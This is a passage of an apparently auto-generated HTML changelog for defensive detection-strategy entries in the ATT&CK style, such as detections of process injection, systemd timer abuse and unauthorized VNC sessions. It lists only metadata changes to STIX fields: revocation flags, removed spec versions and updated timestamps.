style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0103] Behavioral Detection of Network Share Connection Removal via CLI and SMB Disconnects</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0378] Behavioral Detection of Obfuscated Files or Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0106] Behavioral Detection of PE Injection via Remote Memory Mapping</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0179] Behavioral Detection of Permission Groups Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0508] Behavioral Detection of Process Injection Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0002] Behavioral Detection of Publish/Subscribe Protocol Misuse for C2</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0008] Behavioral Detection of Remote Cloud Logins via Valid Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0596] Behavioral Detection of Remote SSH Logins Followed by Post-Login Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0521] Behavioral Detection of Spoofed GUI Credential Prompts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0195] Behavioral Detection of System Network Configuration Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0231] Behavioral Detection of Systemd Timer Abuse for Scheduled Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0518] Behavioral Detection of T1498 – Network Denial of Service Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0295] Behavioral Detection of Thread Execution Hijacking via Thread Suspension and Context Switching</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0178] Behavioral Detection of Unauthorized VNC Remote Control Sessions</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0384] Behavioral Detection of Unix Shell Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid 